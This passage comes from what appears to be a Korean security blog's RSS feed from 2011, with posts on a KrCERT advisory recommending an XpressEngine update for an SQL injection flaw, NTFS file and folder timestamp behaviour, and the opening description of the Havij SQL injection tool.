	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/146&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>Yara</category>
			<category>yara-project</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/146</guid>
			<comments>http://malwarelab.tistory.com/entry/YARA-Project#entry146comment</comments>
			<pubDate>Mon, 09 May 2011 11:16:20 +0900</pubDate>
		</item>
		<item>
			<title>국내 공개 웹 게시판(익스프레스엔진) 보안 업데이트 권고</title>
			<link>http://malwarelab.tistory.com/entry/%EA%B5%AD%EB%82%B4-%EA%B3%B5%EA%B0%9C-%EC%9B%B9-%EA%B2%8C%EC%8B%9C%ED%8C%90%EC%9D%B5%EC%8A%A4%ED%94%84%EB%A0%88%EC%8A%A4%EC%97%94%EC%A7%84-%EB%B3%B4%EC%95%88-%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8-%EA%B6%8C%EA%B3%A0</link>
			<description>&lt;font class=&quot;Apple-style-span&quot; color=&quot;#000000&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
출처 :&amp;nbsp;&lt;a href=&quot;http://www.krcert.or.kr/secureNoticeView.do?num=524&amp;amp;seq=-1&quot; target=&quot;_blank&quot; title=&quot;[http://www.krcert.or.kr/secureNoticeView.do?num=524&amp;amp;seq=-1]로 이동합니다.&quot;&gt;http://www.krcert.or.kr/secureNoticeView.do?num=524&amp;amp;seq=-1&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: 굴림, Arial; line-height: normal; &quot;&gt;&lt;p&gt;&lt;strong&gt;□ 개요&lt;br /&gt;
&lt;/strong&gt;&amp;nbsp; o 국내 PHP기반의 공개 웹 게시판인 익스프레스엔진에서 SQL Injection 취약점이 발견됨[1]&lt;br /&gt;
&amp;nbsp; o 취약한 버전을 사용하고 있을 경우, 홈페이지 해킹에 의한 관리자 계정 및 DB계정 탈취&amp;nbsp; 등의&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 피해를 입을 수 있으므로 웹 관리자의 적극적인 조치 필요&lt;br /&gt;
&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;□ 해당시스템&lt;br /&gt;
&lt;/strong&gt;&amp;nbsp; o 영향받는 소프트웨어[1]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - 익스프레스 엔진1.4.5.5 및 이전 버전&lt;br /&gt;
&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;□ 해결방안&lt;br /&gt;
&lt;/strong&gt;&amp;nbsp; o 기존 익스프레스 엔진 사용자는 업데이트가 적용된 상위 버전으로 업그레이드 [2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ※ 패치 작업 이전에 원본 파일은 백업 필요&lt;br /&gt;
&amp;nbsp; o 익스프레스 엔진을 새로 설치하는 이용자&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - 반드시 보안패치가 적용된 최신버전(1.4.5.7)을 설치&lt;br /&gt;
&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;□ 용어 정리&lt;br /&gt;
&lt;/strong&gt;&amp;nbsp; o PHP : 동적인 웹사이트를 위한 서버 측 스크립트 언어&lt;br /&gt;
&amp;nbsp; o SQL인젝션 : 웹 응용 프로그램에 강제로 SQL구문을 삽입하여 내부 데이터베이스 서버의&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 데이터를 유출 및 변조하고 관리자 인증을 우회할 수 있는 공격&lt;br /&gt;
&amp;nbsp; o 익스프레스엔진 : PHP언어로 작성된 홈페이지용 게시판 소프트웨어 또는 프레임 워크&lt;br /&gt;
&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;□ 기타 문의사항&lt;br /&gt;
&lt;/strong&gt;&amp;nbsp; o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118&lt;br /&gt;
&amp;nbsp;&lt;/p&gt;
&lt;p&gt;[참고사이트]&lt;br /&gt;
[1]&amp;nbsp;&lt;a href=&quot;http://www.xpressengine.com/blog/19728478&quot; style=&quot;font-family: 굴림, Arial; font-size: 12px; text-decoration: none; &quot;&gt;http://www.xpressengine.com/blog/19728478&lt;/a&gt;&lt;br /&gt;
[2]&amp;nbsp;&lt;a href=&quot;http://www.xpressengine.com/?mid=download&amp;amp;package_srl=18325662&quot; style=&quot;font-family: 굴림, Arial; font-size: 12px; text-decoration: none; &quot;&gt;http://www.xpressengine.com/?mid=download&amp;amp;package_srl=18325662&lt;/a&gt;&lt;/p&gt;
&lt;/span&gt;&lt;/font&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-145-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-145-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-145-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/145&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>express engine</category>
			<category>xe</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/145</guid>
			<comments>http://malwarelab.tistory.com/entry/%EA%B5%AD%EB%82%B4-%EA%B3%B5%EA%B0%9C-%EC%9B%B9-%EA%B2%8C%EC%8B%9C%ED%8C%90%EC%9D%B5%EC%8A%A4%ED%94%84%EB%A0%88%EC%8A%A4%EC%97%94%EC%A7%84-%EB%B3%B4%EC%95%88-%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8-%EA%B6%8C%EA%B3%A0#entry145comment</comments>
			<pubDate>Tue, 03 May 2011 14:03:51 +0900</pubDate>
		</item>
		<item>
			<title>파일 및 폴더의 NTFS 날짜 및 시간 스탬프</title>
			<link>http://malwarelab.tistory.com/entry/%ED%8C%8C%EC%9D%BC-%EB%B0%8F-%ED%8F%B4%EB%8D%94%EC%9D%98-NTFS-%EB%82%A0%EC%A7%9C-%EB%B0%8F-%EC%8B%9C%EA%B0%84-%EC%8A%A4%ED%83%AC%ED%94%84</link>
			<description>&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://support.microsoft.com/kb/299648/ko&quot;&gt;&lt;br /&gt;
http://support.microsoft.com/kb/299648/ko&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. 날짜 및 시간 스탬프에 대한 &lt;font class=&quot;Apple-style-span&quot; color=&quot;#3058D2&quot;&gt;파일 속성&lt;/font&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;p style=&quot;margin:0&quot;&gt;&lt;div class=&quot;imageblock&quot; style=&quot;display:inline;&quot;&gt;&lt;a href=&quot;http://cfile29.uf.tistory.com/original/1328504C4DAB3E0229BACA&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile29.uf.tistory.com/image/1328504C4DAB3E0229BACA&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;time.png&quot; height=&quot;119&quot; width=&quot;554&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/p&gt;
&lt;br /&gt;
파일의 속성을 변경하지 않는 한 파일의 수정한 날짜/시간과 만든 날짜/시간은 변경되지 않는다.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. 날짜 및 시간 스탬프에 대한 &lt;font class=&quot;Apple-style-span&quot; color=&quot;#3058D2&quot;&gt;폴더 속성&lt;/font&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;b&gt;D:\NTFS1\NTFS2를 만들어 D:\NTFS2 폴더를 D:\NTFS1 폴더로 &lt;font class=&quot;Apple-style-span&quot; color=&quot;#E31600&quot;&gt;이동한 경우&lt;/font&gt;:&lt;/b&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
D:\NTFS1 - 폴더를 만든 스탬프는 같고 수정한 스탬프는 바뀝니다.&lt;/div&gt;
&lt;div&gt;
D:\NTFS1\NTFS2 - 폴더를 만든 스탬프는 바뀌고 수정한 스탬프는 똑같게 유지됩니다.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
폴더를 이동한 경우에도 D:\NTFS1 폴더 내에서 마스터 파일 테이블(MFT)에 의해 새 폴더가 만들어진 것으로 간주되기 때문에 이러한 문제가 발생합니다.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;D:\NTFS1\NTFS2 폴더를 만들어 D:\NTFS2 폴더를 D:\NTFS1 폴더로 &lt;font class=&quot;Apple-style-span&quot; color=&quot;#E31600&quot;&gt;복사하고&lt;/font&gt;, 복사한 후에도 D:\NTFS2 폴더가 여전히 존재하는 경우:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
D:\NTFS1 - 폴더를 만든 스탬프는 같고 폴더를 수정한 시간과 날짜 스탬프는 바뀝니다.&lt;/div&gt;
&lt;div&gt;
D:\NTFS2 - 원본 폴더이기 때문에 바뀌지 않습니다.&lt;/div&gt;
&lt;div&gt;
D:\NTFS1\NTFS2 - 폴더를 만든 스탬프와 폴더를 수정한 스탬프가 모두 이동한 시간의 스탬프에 해당하는 같은 스탬프로 변경됩니다.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div&gt;
폴더를 복사한 경우에도 MFT가 새 폴더를 만든 것으로 간주되고 새로운 만든 시간 스탬프와 수정한 시간 스탬프가 제공되기 때문에 이러한 문제가 발생합니다.&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-143-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-143-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-143-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/143&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>NTFS 날짜</category>
			<category>만든 날짜</category>
			<category>수정한 날짜</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/143</guid>
			<comments>http://malwarelab.tistory.com/entry/%ED%8C%8C%EC%9D%BC-%EB%B0%8F-%ED%8F%B4%EB%8D%94%EC%9D%98-NTFS-%EB%82%A0%EC%A7%9C-%EB%B0%8F-%EC%8B%9C%EA%B0%84-%EC%8A%A4%ED%83%AC%ED%94%84#entry143comment</comments>
			<pubDate>Mon, 18 Apr 2011 05:18:32 +0900</pubDate>
		</item>
		<item>
			<title>Havij v1.14 Advanced SQL Injection</title>
			<link>http://malwarelab.tistory.com/entry/Havij-v114-Advanced-SQL-Injection</link>
			<description>&lt;br /&gt;
&lt;br /&gt;
&lt;DIV style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;br /&gt;
&lt;/DIV&gt;
&lt;DIV style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;IMG style=&quot;FLOAT: none; CLEAR: none&quot; src=&quot;http://www.itsecteam.com/pic/main.png&quot;&gt;&lt;/DIV&gt;
&lt;DIV style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;br /&gt;
&lt;/DIV&gt;
&lt;DIV style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;br /&gt;
&lt;/DIV&gt;&lt;br /&gt;

&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 10pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=left&gt;&lt;STRONG&gt;&lt;FONT size=2 face=&quot;Arial, Helvetica, sans-serif&quot;&gt;Description:&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;SPAN style=&quot;LINE-HEIGHT: normal; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=Apple-style-span&gt;&lt;FONT color=#330000&gt;&lt;/FONT&gt;&lt;/SPAN&gt;
&lt;P style=&quot;LINE-HEIGHT: normal; MARGIN: 0in 0in 0pt; BORDER-COLLAPSE: collapse; FONT-FAMILY: '맑은 고딕'; COLOR: rgb(0,0,0); FONT-SIZE: medium; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px&quot; class=MsoNormal align=justify&gt;&lt;SPAN style=&quot;FONT-FAMILY: Calibri&quot;&gt;&lt;FONT color=#330000&gt;&lt;FONT color=#330000&gt;&lt;FONT face=&quot;Arial, Helvetica, sans-serif&quot;&gt;&lt;FONT size=2&gt;Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.&lt;!--?xml:namespace prefix = o /--&gt;&lt;?xml:namespace prefix = o /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
